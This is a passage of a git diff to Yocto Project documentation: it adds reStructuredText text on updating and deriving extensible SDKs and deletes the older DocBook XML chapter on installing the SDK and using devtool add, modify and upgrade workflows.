+It is important to remember that building the item from source
+takes significantly longer than installing the pre-built artifact. Also,
+if no recipe exists for the item you want to add to the SDK, you must
+instead add the item using the ``devtool add`` command.
+
+.. _sdk-applying-updates-to-an-installed-extensible-sdk:
+
+Applying Updates to an Installed Extensible SDK
+===============================================
+
+If you are working with an installed extensible SDK that gets
+occasionally updated (e.g. a third-party SDK), then you will need to
+manually "pull down" the updates into the installed SDK.
+
+To update your installed SDK, use ``devtool`` as follows:
+::
+
+ $ devtool sdk-update
+
+The previous command assumes your SDK provider has set the
+default update URL for you through the
+:term:`SDK_UPDATE_URL`
+variable as described in the "`Providing Updates to the Extensible SDK
+After
+Installation <#sdk-providing-updates-to-the-extensible-sdk-after-installation>`__"
+section. If the SDK provider has not set that default URL, you need to
+specify it yourself in the command as follows: $ devtool sdk-update
+path_to_update_directory
+
+.. note::
+
+ The URL needs to point specifically to a published SDK and not to an
+ SDK installer that you would download and install.
+
+.. _sdk-creating-a-derivative-sdk-with-additional-components:
+
+Creating a Derivative SDK With Additional Components
+====================================================
+
+You might need to produce an SDK that contains your own custom
+libraries. A good example would be if you were a vendor with customers
+that use your SDK to build their own platform-specific software and
+those customers need an SDK that has custom libraries. In such a case,
+you can produce a derivative SDK based on the currently installed SDK
+fairly easily by following these steps:
+
+1. If necessary, install an extensible SDK that you want to use as a
+ base for your derivative SDK.
+
+2. Source the environment script for the SDK.
+
+3. Add the extra libraries or other components you want by using the
+ ``devtool add`` command.
+
+4. Run the ``devtool build-sdk`` command.
+
+The previous steps take the recipes added to the workspace and construct
+a new SDK installer that contains those recipes and the resulting binary
+artifacts. The recipes go into their own separate layer in the
+constructed derivative SDK, which leaves the workspace clean and ready
+for users to add their own recipes.
diff --git a/documentation/sdk-manual/sdk-extensible.xml b/documentation/sdk-manual/sdk-extensible.xml
deleted file mode 100644
index 94d2a241fe..0000000000
--- a/documentation/sdk-manual/sdk-extensible.xml
+++ /dev/null
@@ -1,1846 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='sdk-extensible'>
-
- <title>Using the Extensible SDK</title>
-
- <para>
- This chapter describes the extensible SDK and how to install it.
- Information covers the pieces of the SDK, how to install it, and
- presents a look at using the <filename>devtool</filename>
- functionality.
- The extensible SDK makes it easy to add new applications and libraries
- to an image, modify the source for an existing component, test
- changes on the target hardware, and ease integration into the rest of
- the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>.
- <note>
- For a side-by-side comparison of main features supported for an
- extensible SDK as compared to a standard SDK, see the
- "<link linkend='sdk-manual-intro'>Introduction</link>"
- section.
- </note>
- </para>
-
- <para>
- In addition to the functionality available through
- <filename>devtool</filename>, you can alternatively make use of the
- toolchain directly, for example from Makefile and Autotools.
- See the
- "<link linkend='sdk-working-projects'>Using the SDK Toolchain Directly</link>"
- chapter for more information.
- </para>
-
- <section id='sdk-extensible-sdk-intro'>
- <title>Why use the Extensible SDK and What is in It?</title>
-
- <para>
- The extensible SDK provides a cross-development toolchain and
- libraries tailored to the contents of a specific image.
- You would use the Extensible SDK if you want a toolchain experience
- supplemented with the powerful set of <filename>devtool</filename>
- commands tailored for the Yocto Project environment.
- </para>
-
- <para>
- The installed extensible SDK consists of several files and
- directories.
- Basically, it contains an SDK environment setup script, some
- configuration files, an internal build system, and the
- <filename>devtool</filename> functionality.
- </para>
- </section>
-
- <section id='sdk-installing-the-extensible-sdk'>
- <title>Installing the Extensible SDK</title>
-
- <para>
- The first thing you need to do is install the SDK on your
- <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>Build Host</ulink>
- by running the <filename>*.sh</filename> installation script.
- </para>
-
- <para>
- You can download a tarball installer, which includes the
- pre-built toolchain, the <filename>runqemu</filename>
- script, the internal build system, <filename>devtool</filename>,
- and support files from the appropriate
- <ulink url='&YOCTO_TOOLCHAIN_DL_URL;'>toolchain</ulink>
- directory within the Index of Releases.
- Toolchains are available for several 32-bit and 64-bit
- architectures with the <filename>x86_64</filename> directories,
- respectively.
- The toolchains the Yocto Project provides are based off the
- <filename>core-image-sato</filename> and
- <filename>core-image-minimal</filename> images and contain
- libraries appropriate for developing against that image.
- </para>
-
- <para>
- The names of the tarball installer scripts are such that a
- string representing the host system appears first in the
- filename and then is immediately followed by a string
- representing the target architecture.
- An extensible SDK has the string "-ext" as part of the name.
- Following is the general form:
- <literallayout class='monospaced'>
- poky-glibc-<replaceable>host_system</replaceable>-<replaceable>image_type</replaceable>-<replaceable>arch</replaceable>-toolchain-ext-<replaceable>release_version</replaceable>.sh
-
- Where:
- <replaceable>host_system</replaceable> is a string representing your development system:
-
- i686 or x86_64.
-
- <replaceable>image_type</replaceable> is the image for which the SDK was built:
-
- core-image-sato or core-image-minimal
-
- <replaceable>arch</replaceable> is a string representing the tuned target architecture:
-
- aarch64, armv5e, core2-64, i586, mips32r2, mips64, ppc7400, or cortexa8hf-neon
-
- <replaceable>release_version</replaceable> is a string representing the release number of the Yocto Project:
-
- &DISTRO;, &DISTRO;+snapshot
- </literallayout>
- For example, the following SDK installer is for a 64-bit
- development host system and a i586-tuned target architecture
- based off the SDK for <filename>core-image-sato</filename> and
- using the current &DISTRO; snapshot:
- <literallayout class='monospaced'>
- poky-glibc-x86_64-core-image-sato-i586-toolchain-ext-&DISTRO;.sh
- </literallayout>
- <note>
- As an alternative to downloading an SDK, you can build the
- SDK installer.
- For information on building the installer, see the
- "<link linkend='sdk-building-an-sdk-installer'>Building an SDK Installer</link>"
- section.
- </note>
- </para>
-
- <para>
- The SDK and toolchains are self-contained and by default are
- installed into the <filename>poky_sdk</filename> folder in your
- home directory.
- You can choose to install the extensible SDK in any location when
- you run the installer.
- However, because files need to be written under that directory
- during the normal course of operation, the location you choose
- for installation must be writable for whichever
- users need to use the SDK.
- </para>
-
- <para>
- The following command shows how to run the installer given a
- toolchain tarball for a 64-bit x86 development host system and
- a 64-bit x86 target architecture.
- The example assumes the SDK installer is located in
- <filename>~/Downloads/</filename> and has execution rights.
- <note>
- If you do not have write permissions for the directory
- into which you are installing the SDK, the installer
- notifies you and exits.
- For that case, set up the proper permissions in the directory
- and run the installer again.
- </note>
- <literallayout class='monospaced'>
- $ ./Downloads/poky-glibc-x86_64-core-image-minimal-core2-64-toolchain-ext-2.5.sh
- Poky (Yocto Project Reference Distro) Extensible SDK installer version 2.5
- ==========================================================================
- Enter target directory for SDK (default: ~/poky_sdk):
- You are about to install the SDK to "/home/scottrif/poky_sdk". Proceed [Y/n]? Y
- Extracting SDK..............done
- Setting it up...
- Extracting buildtools...
- Preparing build system...
- Parsing recipes: 100% |##################################################################| Time: 0:00:52
- Initialising tasks: 100% |###############################################################| Time: 0:00:00
- Checking sstate mirror object availability: 100% |#######################################| Time: 0:00:00
- Loading cache: 100% |####################################################################| Time: 0:00:00
- Initialising tasks: 100% |###############################################################| Time: 0:00:00
- done
- SDK has been successfully set up and is ready to be used.
- Each time you wish to use the SDK in a new shell session, you need to source the environment setup script e.g.
- $ . /home/scottrif/poky_sdk/environment-setup-core2-64-poky-linux
-
- </literallayout>
- </para>
- </section>
-
- <section id='sdk-running-the-extensible-sdk-environment-setup-script'>
- <title>Running the Extensible SDK Environment Setup Script</title>
-
- <para>
- Once you have the SDK installed, you must run the SDK environment
- setup script before you can actually use the SDK.
- This setup script resides in the directory you chose when you
- installed the SDK, which is either the default
- <filename>poky_sdk</filename> directory or the directory you
- chose during installation.
- </para>
-
- <para>
- Before running the script, be sure it is the one that matches the
- architecture for which you are developing.
- Environment setup scripts begin with the string
- "<filename>environment-setup</filename>" and include as part of
- their name the tuned target architecture.
- As an example, the following commands set the working directory
- to where the SDK was installed and then source the environment
- setup script.
- In this example, the setup script is for an IA-based
- target machine using i586 tuning:
- <literallayout class='monospaced'>
- $ cd /home/scottrif/poky_sdk
- $ source environment-setup-core2-64-poky-linux
- SDK environment now set up; additionally you may now run devtool to perform development tasks.
- Run devtool --help for further details.
- </literallayout>
- Running the setup script defines many environment variables needed
- in order to use the SDK (e.g. <filename>PATH</filename>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CC'><filename>CC</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LD'><filename>LD</filename></ulink>,
- and so forth).
- If you want to see all the environment variables the script
- exports, examine the installation file itself.
- </para>
- </section>
-
- <section id='using-devtool-in-your-sdk-workflow'>
- <title>Using <filename>devtool</filename> in Your SDK Workflow</title>
-
- <para>
- The cornerstone of the extensible SDK is a command-line tool
- called <filename>devtool</filename>.
- This tool provides a number of features that help
- you build, test and package software within the extensible SDK, and
- optionally integrate it into an image built by the OpenEmbedded
- build system.
- <note><title>Tip</title>
- The use of <filename>devtool</filename> is not limited to
- the extensible SDK.
- You can use <filename>devtool</filename> to help you easily
- develop any project whose build output must be part of an
- image built using the build system.
- </note>
- </para>
-
- <para>
- The <filename>devtool</filename> command line is organized
- similarly to
- <ulink url='&YOCTO_DOCS_OM_URL;#git'>Git</ulink> in that it
- has a number of sub-commands for each function.
- You can run <filename>devtool --help</filename> to see all the
- commands.
- <note>
- See the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-devtool-reference'><filename>devtool</filename>&nbsp;Quick Reference</ulink>"
- in the Yocto Project Reference Manual for a
- <filename>devtool</filename> quick reference.
- </note>
- </para>
-
- <para>
- Three <filename>devtool</filename> subcommands exist that provide
- entry-points into development:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>devtool add</filename></emphasis>:
- Assists in adding new software to be built.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>devtool modify</filename></emphasis>:
- Sets up an environment to enable you to modify the source of
- an existing component.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>devtool upgrade</filename></emphasis>:
- Updates an existing recipe so that you can build it for
- an updated set of source files.
- </para></listitem>
- </itemizedlist>
- As with the build system, "recipes" represent software packages
- within <filename>devtool</filename>.
- When you use <filename>devtool add</filename>, a recipe is
- automatically created.
- When you use <filename>devtool modify</filename>, the specified
- existing recipe is used in order to determine where to get the
- source code and how to patch it.
- In both cases, an environment is set up so that when you build the
- recipe a source tree that is under your control is used in order to
- allow you to make changes to the source as desired.
- By default, new recipes and the source go into a "workspace"
- directory under the SDK.
- </para>
-
- <para>
- The remainder of this section presents the
- <filename>devtool add</filename>,
- <filename>devtool modify</filename>, and
- <filename>devtool upgrade</filename> workflows.
- </para>
-
- <section id='sdk-use-devtool-to-add-an-application'>
- <title>Use <filename>devtool add</filename> to Add an Application</title>
-
- <para>
- The <filename>devtool add</filename> command generates
- a new recipe based on existing source code.
- This command takes advantage of the
- <ulink url='&YOCTO_DOCS_REF_URL;#devtool-the-workspace-layer-structure'>workspace</ulink>
- layer that many <filename>devtool</filename> commands
- use.
- The command is flexible enough to allow you to extract source
- code into both the workspace or a separate local Git repository
- and to use existing code that does not need to be extracted.
- </para>
-
- <para>
- Depending on your particular scenario, the arguments and options
- you use with <filename>devtool add</filename> form different
- combinations.
- The following diagram shows common development flows
- you would use with the <filename>devtool add</filename>
- command:
- </para>
-
- <para>
- <imagedata fileref="figures/sdk-devtool-add-flow.png" align="center" />
- </para>
-
- <para>
- <orderedlist>
- <listitem><para><emphasis>Generating the New Recipe</emphasis>:
- The top part of the flow shows three scenarios by which
- you could use <filename>devtool add</filename> to
- generate a recipe based on existing source code.</para>
-
- <para>In a shared development environment, it is
- typical for other developers to be responsible for
- various areas of source code.
- As a developer, you are probably interested in using
- that source code as part of your development within
- the Yocto Project.
- All you need is access to the code, a recipe, and a
- controlled area in which to do your work.</para>
-
- <para>Within the diagram, three possible scenarios
- feed into the <filename>devtool add</filename> workflow:
- <itemizedlist>
- <listitem><para>
- <emphasis>Left</emphasis>:
- The left scenario in the figure represents a
- common situation where the source code does not
- exist locally and needs to be extracted.
- In this situation, the source code is extracted
- to the default workspace - you do not
- want the files in some specific location
- outside of the workspace.
- Thus, everything you need will be located in
- the workspace:
- <literallayout class='monospaced'>
- $ devtool add <replaceable>recipe fetchuri</replaceable>
- </literallayout>
- With this command, <filename>devtool</filename>
- extracts the upstream source files into a local
- Git repository within the
- <filename>sources</filename> folder.
- The command then creates a recipe named
- <replaceable>recipe</replaceable> and a
- corresponding append file in the workspace.
- If you do not provide
- <replaceable>recipe</replaceable>, the command
- makes an attempt to determine the recipe name.
- </para></listitem>
- <listitem><para>
- <emphasis>Middle</emphasis>:
- The middle scenario in the figure also
- represents a situation where the source code
- does not exist locally.
- In this case, the code is again upstream
- and needs to be extracted to some
- local area - this time outside of the default
- workspace.
- <note>
- If required, <filename>devtool</filename>
- always creates
- a Git repository locally during the
- extraction.
- </note>
- Furthermore, the first positional argument
- <replaceable>srctree</replaceable> in this
- case identifies where the
- <filename>devtool add</filename> command
- will locate the extracted code outside of the
- workspace.
- You need to specify an empty directory:
- <literallayout class='monospaced'>
- $ devtool add <replaceable>recipe srctree fetchuri</replaceable>
- </literallayout>
- In summary, the source code is pulled from
- <replaceable>fetchuri</replaceable> and
- extracted into the location defined by
- <replaceable>srctree</replaceable> as a local
- Git repository.</para>
-
- <para>Within workspace,
- <filename>devtool</filename> creates a
- recipe named <replaceable>recipe</replaceable>
- along with an associated append file.
- </para></listitem>
- <listitem><para>
- <emphasis>Right</emphasis>:
- The right scenario in the figure represents a
- situation where the
- <replaceable>srctree</replaceable> has been
- previously prepared outside of the
- <filename>devtool</filename> workspace.</para>
-
- <para>The following command provides a new
- recipe name and identifies the existing source
- tree location:
- <literallayout class='monospaced'>
- $ devtool add <replaceable>recipe srctree</replaceable>
- </literallayout>
- The command examines the source code and
- creates a recipe named
- <replaceable>recipe</replaceable> for the code
- and places the recipe into the workspace.
- </para>
-
- <para>Because the extracted source code already
- exists, <filename>devtool</filename> does not
- try to relocate the source code into the
- workspace - only the new recipe is placed
- in the workspace.</para>
-
- <para>Aside from a recipe folder, the command
- also creates an associated append folder and
- places an initial
- <filename>*.bbappend</filename> file within.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Edit the Recipe</emphasis>:
- You can use <filename>devtool edit-recipe</filename>
- to open up the editor as defined by the
- <filename>$EDITOR</filename> environment variable
- and modify the file:
- <literallayout class='monospaced'>
- $ devtool edit-recipe <replaceable>recipe</replaceable>
- </literallayout>
- From within the editor, you can make modifications to
- the recipe that take affect when you build it later.
- </para></listitem>
- <listitem><para>
- <emphasis>Build the Recipe or Rebuild the Image</emphasis>:
- The next step you take depends on what you are going
- to do with the new code.</para>
-
- <para>If you need to eventually move the build output
- to the target hardware, use the following
- <filename>devtool</filename> command:
- <literallayout class='monospaced'>
- $ devtool build <replaceable>recipe</replaceable>
- </literallayout></para>
-
- <para>On the other hand, if you want an image to
- contain the recipe's packages from the workspace
- for immediate deployment onto a device (e.g. for
- testing purposes), you can use
- the <filename>devtool build-image</filename> command:
- <literallayout class='monospaced'>
- $ devtool build-image <replaceable>image</replaceable>
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Deploy the Build Output</emphasis>:
- When you use the <filename>devtool build</filename>
- command to build out your recipe, you probably want to
- see if the resulting build output works as expected
- on the target hardware.
- <note>
- This step assumes you have a previously built
- image that is already either running in QEMU or
- is running on actual hardware.
- Also, it is assumed that for deployment of the
- image to the target, SSH is installed in the image
- and, if the image is running on real hardware,
- you have network access to and from your
- development machine.
- </note>
- You can deploy your build output to that target
- hardware by using the
- <filename>devtool deploy-target</filename> command:
- <literallayout class='monospaced'>
- $ devtool deploy-target <replaceable>recipe target</replaceable>
- </literallayout>
- The <replaceable>target</replaceable> is a live target
- machine running as an SSH server.</para>
-
- <para>You can, of course, also deploy the image you
- build to actual hardware by using the
- <filename>devtool build-image</filename> command.
- However, <filename>devtool</filename> does not provide
- a specific command that allows you to deploy the
- image to actual hardware.
- </para></listitem>
- <listitem><para>
- <emphasis>Finish Your Work With the Recipe</emphasis>:
- The <filename>devtool finish</filename> command creates
- any patches corresponding to commits in the local
- Git repository, moves the new recipe to a more permanent
- layer, and then resets the recipe so that the recipe is
- built normally rather than from the workspace.
- <literallayout class='monospaced'>
- $ devtool finish <replaceable>recipe layer</replaceable>
- </literallayout>
- <note>
- Any changes you want to turn into patches must be
- committed to the Git repository in the source tree.
- </note></para>
-
- <para>As mentioned, the
- <filename>devtool finish</filename> command moves the
- final recipe to its permanent layer.
- </para>
-
- <para>As a final process of the
- <filename>devtool finish</filename> command, the state
- of the standard layers and the upstream source is
- restored so that you can build the recipe from those
- areas rather than the workspace.
- <note>
- You can use the <filename>devtool reset</filename>
- command to put things back should you decide you
- do not want to proceed with your work.
- If you do use this command, realize that the source
- tree is preserved.
- </note>
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='sdk-devtool-use-devtool-modify-to-modify-the-source-of-an-existing-component'>
- <title>Use <filename>devtool modify</filename> to Modify the Source of an Existing Component</title>
-
- <para>
- The <filename>devtool modify</filename> command prepares the
- way to work on existing code that already has a local recipe in
- place that is used to build the software.
- The command is flexible enough to allow you to extract code
- from an upstream source, specify the existing recipe, and
- keep track of and gather any patch files from other developers
- that are associated with the code.
- </para>
-
- <para>
- Depending on your particular scenario, the arguments and options
- you use with <filename>devtool modify</filename> form different
- combinations.
- The following diagram shows common development flows for the
- <filename>devtool modify</filename> command:
- </para>
-
- <para>
- <imagedata fileref="figures/sdk-devtool-modify-flow.png" align="center" />
- </para>
-
- <para>
- <orderedlist>
- <listitem><para>
- <emphasis>Preparing to Modify the Code</emphasis>:
- The top part of the flow shows three scenarios by which
- you could use <filename>devtool modify</filename> to
- prepare to work on source files.
- Each scenario assumes the following:
- <itemizedlist>
- <listitem><para>
- The recipe exists locally in a layer external
- to the <filename>devtool</filename> workspace.
- </para></listitem>
- <listitem><para>
- The source files exist either upstream in an
- un-extracted state or locally in a previously
- extracted state.
- </para></listitem>
- </itemizedlist>
- The typical situation is where another developer has
- created a layer for use with the Yocto Project and
- their recipe already resides in that layer.
- Furthermore, their source code is readily available
- either upstream or locally.
- <itemizedlist>
- <listitem><para>
- <emphasis>Left</emphasis>:
- The left scenario in the figure represents a
- common situation where the source code does
- not exist locally and it needs to be extracted
- from an upstream source.
- In this situation, the source is extracted
- into the default <filename>devtool</filename>
- workspace location.
- The recipe, in this scenario, is in its own
- layer outside the workspace
- (i.e.
- <filename>meta-</filename><replaceable>layername</replaceable>).
- </para>
-
- <para>The following command identifies the
- recipe and, by default, extracts the source
- files:
- <literallayout class='monospaced'>
- $ devtool modify <replaceable>recipe</replaceable>
- </literallayout>
- Once <filename>devtool</filename>locates the
- recipe, <filename>devtool</filename> uses the
- recipe's
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- statements to locate the source code and any
- local patch files from other developers.</para>
-
- <para>With this scenario, no
- <replaceable>srctree</replaceable> argument
- exists.
- Consequently, the default behavior of the
- <filename>devtool modify</filename> command is
- to extract the source files pointed to by the
- <filename>SRC_URI</filename> statements into a
- local Git structure.
- Furthermore, the location for the extracted
- source is the default area within the
- <filename>devtool</filename> workspace.
- The result is that the command sets up both
- the source code and an append file within the
- workspace while the recipe remains in its
- original location.</para>
-
- <para>Additionally, if you have any non-patch
- local files (i.e. files referred to with
- <filename>file://</filename> entries in
- <filename>SRC_URI</filename> statement excluding
- <filename>*.patch/</filename> or
- <filename>*.diff</filename>), these files are
- copied to an
- <filename>oe-local-files</filename> folder
- under the newly created source tree.
- Copying the files here gives you a convenient
- area from which you can modify the files.
- Any changes or additions you make to those
- files are incorporated into the build the next
- time you build the software just as are other
- changes you might have made to the source.
- </para></listitem>
- <listitem><para>
- <emphasis>Middle</emphasis>:
- The middle scenario in the figure represents a
- situation where the source code also does not
- exist locally.
- In this case, the code is again upstream
- and needs to be extracted to some
- local area as a Git repository.
- The recipe, in this scenario, is again local
- and in its own layer outside the workspace.
- </para>
-
- <para>The following command tells
- <filename>devtool</filename> the recipe with
- which to work and, in this case, identifies a
- local area for the extracted source files that
- exists outside of the default
- <filename>devtool</filename> workspace:
- <literallayout class='monospaced'>
- $ devtool modify <replaceable>recipe srctree</replaceable>
- </literallayout>
- <note>
- You cannot provide a URL for
- <replaceable>srctree</replaceable> using
- the <filename>devtool</filename> command.
- </note>
- As with all extractions, the command uses
- the recipe's <filename>SRC_URI</filename>
- statements to locate the source files and any
- associated patch files.
- Non-patch files are copied to an
- <filename>oe-local-files</filename> folder
- under the newly created source tree.</para>
-
- <para>Once the files are located, the command
- by default extracts them into
- <replaceable>srctree</replaceable>.</para>
-
- <para>Within workspace,
- <filename>devtool</filename> creates an append
- file for the recipe.
- The recipe remains in its original location but
- the source files are extracted to the location
- you provide with
- <replaceable>srctree</replaceable>.
- </para></listitem>
- <listitem><para>
- <emphasis>Right</emphasis>:
- The right scenario in the figure represents a
- situation where the source tree
- (<replaceable>srctree</replaceable>) already
- exists locally as a previously extracted Git
- structure outside of the
- <filename>devtool</filename> workspace.
- In this example, the recipe also exists
- elsewhere locally in its own layer.
- </para>
-
- <para>The following command tells
- <filename>devtool</filename> the recipe
- with which to work, uses the "-n" option to
- indicate source does not need to be extracted,
- and uses <replaceable>srctree</replaceable> to
- point to the previously extracted source files:
- <literallayout class='monospaced'>
- $ devtool modify -n <replaceable>recipe srctree</replaceable>
- </literallayout>
- </para>
-
- <para>If an <filename>oe-local-files</filename>
- subdirectory happens to exist and it contains
- non-patch files, the files are used.
- However, if the subdirectory does not exist and
- you run the <filename>devtool finish</filename>
- command, any non-patch files that might exist
- next to the recipe are removed because it
- appears to <filename>devtool</filename> that
- you have deleted those files.</para>
-
- <para>Once the
- <filename>devtool modify</filename> command
- finishes, it creates only an append file for
- the recipe in the <filename>devtool</filename>
- workspace.
- The recipe and the source code remain in their
- original locations.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Edit the Source</emphasis>:
- Once you have used the
- <filename>devtool modify</filename> command, you are
- free to make changes to the source files.
- You can use any editor you like to make and save
- your source code modifications.
- </para></listitem>
- <listitem><para>
- <emphasis>Build the Recipe or Rebuild the Image</emphasis>:
- The next step you take depends on what you are going
- to do with the new code.</para>
-
- <para>If you need to eventually move the build output
- to the target hardware, use the following
- <filename>devtool</filename> command:
- <literallayout class='monospaced'>
- $ devtool build <replaceable>recipe</replaceable>
- </literallayout></para>
-
- <para>On the other hand, if you want an image to
- contain the recipe's packages from the workspace
- for immediate deployment onto a device (e.g. for
- testing purposes), you can use
- the <filename>devtool build-image</filename> command:
- <literallayout class='monospaced'>
- $ devtool build-image <replaceable>image</replaceable>
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Deploy the Build Output</emphasis>:
- When you use the <filename>devtool build</filename>
- command to build out your recipe, you probably want to
- see if the resulting build output works as expected
- on target hardware.
- <note>
- This step assumes you have a previously built
- image that is already either running in QEMU or
- running on actual hardware.
- Also, it is assumed that for deployment of the image
- to the target, SSH is installed in the image and if
- the image is running on real hardware that you have
- network access to and from your development machine.
- </note>
- You can deploy your build output to that target
- hardware by using the
- <filename>devtool deploy-target</filename> command:
- <literallayout class='monospaced'>
- $ devtool deploy-target <replaceable>recipe target</replaceable>
- </literallayout>
- The <replaceable>target</replaceable> is a live target
- machine running as an SSH server.</para>
-
- <para>You can, of course, use other methods to deploy
- the image you built using the
- <filename>devtool build-image</filename> command to
- actual hardware.
- <filename>devtool</filename> does not provide
- a specific command to deploy the image to actual
- hardware.
- </para></listitem>
- <listitem><para>
- <emphasis>Finish Your Work With the Recipe</emphasis>:
- The <filename>devtool finish</filename> command creates
- any patches corresponding to commits in the local
- Git repository, updates the recipe to point to them
- (or creates a <filename>.bbappend</filename> file to do
- so, depending on the specified destination layer), and
- then resets the recipe so that the recipe is built
- normally rather than from the workspace.
- <literallayout class='monospaced'>
- $ devtool finish <replaceable>recipe layer</replaceable>
- </literallayout>
- <note>
- Any changes you want to turn into patches must be
- staged and committed within the local Git
- repository before you use the
- <filename>devtool finish</filename> command.
- </note></para>
-
- <para>Because there is no need to move the recipe,
- <filename>devtool finish</filename> either updates the
- original recipe in the original layer or the command
- creates a <filename>.bbappend</filename> file in a
- different layer as provided by
- <replaceable>layer</replaceable>.
- Any work you did in the
- <filename>oe-local-files</filename> directory is
- preserved in the original files next to the recipe
- during the <filename>devtool finish</filename>
- command.</para>
-
- <para>As a final process of the
- <filename>devtool finish</filename> command, the state
- of the standard layers and the upstream source is
- restored so that you can build the recipe from those
- areas rather than from the workspace.
- <note>
- You can use the <filename>devtool reset</filename>
- command to put things back should you decide you
- do not want to proceed with your work.
- If you do use this command, realize that the source
- tree is preserved.
- </note>
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='sdk-devtool-use-devtool-upgrade-to-create-a-version-of-the-recipe-that-supports-a-newer-version-of-the-software'>
- <title>Use <filename>devtool upgrade</filename> to Create a Version of the Recipe that Supports a Newer Version of the Software</title>
-
- <para>
- The <filename>devtool upgrade</filename> command upgrades
- an existing recipe to that of a more up-to-date version
- found upstream.
- Throughout the life of software, recipes continually undergo
- version upgrades by their upstream publishers.
- You can use the <filename>devtool upgrade</filename>
- workflow to make sure your recipes you are using for builds
- are up-to-date with their upstream counterparts.
- <note>
- Several methods exist by which you can upgrade recipes -
- <filename>devtool upgrade</filename> happens to be one.
- You can read about all the methods by which you can
- upgrade recipes in the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#gs-upgrading-recipes'>Upgrading Recipes</ulink>"
- section of the Yocto Project Development Tasks Manual.
- </note>
- </para>
-
- <para>
- The <filename>devtool upgrade</filename> command is flexible
- enough to allow you to specify source code revision and
- versioning schemes, extract code into or out of the
- <filename>devtool</filename>
- <ulink url='&YOCTO_DOCS_REF_URL;#devtool-the-workspace-layer-structure'>workspace</ulink>,
- and work with any source file forms that the
- <ulink url='&YOCTO_DOCS_BB_URL;#bb-fetchers'>fetchers</ulink>
- support.
- </para>
-
- <para>
- The following diagram shows the common development flow
- used with the <filename>devtool upgrade</filename> command:
- </para>
-
- <para>
- <imagedata fileref="figures/sdk-devtool-upgrade-flow.png" align="center" />
- </para>
-
- <para>
- <orderedlist>
- <listitem><para>
- <emphasis>Initiate the Upgrade</emphasis>:
- The top part of the flow shows the typical scenario by
- which you use the <filename>devtool upgrade</filename>
- command.
- The following conditions exist:
- <itemizedlist>
- <listitem><para>
- The recipe exists in a local layer external
- to the <filename>devtool</filename> workspace.
- </para></listitem>
- <listitem><para>
- The source files for the new release
- exist in the same location pointed to by
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- in the recipe (e.g. a tarball with the new
- version number in the name, or as a different
- revision in the upstream Git repository).
- </para></listitem>
- </itemizedlist>
- A common situation is where third-party software has
- undergone a revision so that it has been upgraded.
- The recipe you have access to is likely in your own
- layer.
- Thus, you need to upgrade the recipe to use the
- newer version of the software:
- <literallayout class='monospaced'>
- $ devtool upgrade -V <replaceable>version recipe</replaceable>
- </literallayout>
- By default, the <filename>devtool upgrade</filename>
- command extracts source code into the
- <filename>sources</filename> directory in the
- <ulink url='&YOCTO_DOCS_REF_URL;#devtool-the-workspace-layer-structure'>workspace</ulink>.
- If you want the code extracted to any other location,
- you need to provide the
- <replaceable>srctree</replaceable> positional argument
- with the command as follows:
- <literallayout class='monospaced'>
- $ devtool upgrade -V <replaceable>version recipe srctree</replaceable>
- </literallayout>
- <note>
- In this example, the "-V" option specifies the new
- version.
- If you don't use "-V", the command upgrades the
- recipe to the latest version.
- </note>
- If the source files pointed to by the
- <filename>SRC_URI</filename> statement in the recipe
- are in a Git repository, you must provide the "-S"
- option and specify a revision for the software.</para>
-
- <para>Once <filename>devtool</filename> locates the
- recipe, it uses the <filename>SRC_URI</filename>
- variable to locate the source code and any local patch
- files from other developers.
- The result is that the command sets up the source
- code, the new version of the recipe, and an append file
- all within the workspace.</para>
-
- <para>Additionally, if you have any non-patch
- local files (i.e. files referred to with
- <filename>file://</filename> entries in
- <filename>SRC_URI</filename> statement excluding
- <filename>*.patch/</filename> or
- <filename>*.diff</filename>), these files are
- copied to an
- <filename>oe-local-files</filename> folder
- under the newly created source tree.
- Copying the files here gives you a convenient
- area from which you can modify the files.
- Any changes or additions you make to those
- files are incorporated into the build the next
- time you build the software just as are other
- changes you might have made to the source.
- </para></listitem>
- <listitem><para>
- <emphasis>Resolve any Conflicts created by the Upgrade</emphasis>:
- Conflicts could exist due to the software being
- upgraded to a new version.
- Conflicts occur if your recipe specifies some patch
- files in <filename>SRC_URI</filename> that conflict
- with changes made in the new version of the software.
- For such cases, you need to resolve the conflicts
- by editing the source and following the normal
- <filename>git rebase</filename> conflict resolution
- process.</para>
-
- <para>Before moving onto the next step, be sure to
- resolve any such conflicts created through use of a
- newer or different version of the software.
- </para></listitem>
- <listitem><para>
- <emphasis>Build the Recipe or Rebuild the Image</emphasis>:
- The next step you take depends on what you are going
- to do with the new code.</para>
-
- <para>If you need to eventually move the build output
- to the target hardware, use the following
- <filename>devtool</filename> command:
- <literallayout class='monospaced'>
- $ devtool build <replaceable>recipe</replaceable>
- </literallayout></para>
-
- <para>On the other hand, if you want an image to
- contain the recipe's packages from the workspace
- for immediate deployment onto a device (e.g. for
- testing purposes), you can use
- the <filename>devtool build-image</filename> command:
- <literallayout class='monospaced'>
- $ devtool build-image <replaceable>image</replaceable>
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Deploy the Build Output</emphasis>:
- When you use the <filename>devtool build</filename>
- command or <filename>bitbake</filename> to build
- your recipe, you probably want to see if the resulting
- build output works as expected on target hardware.
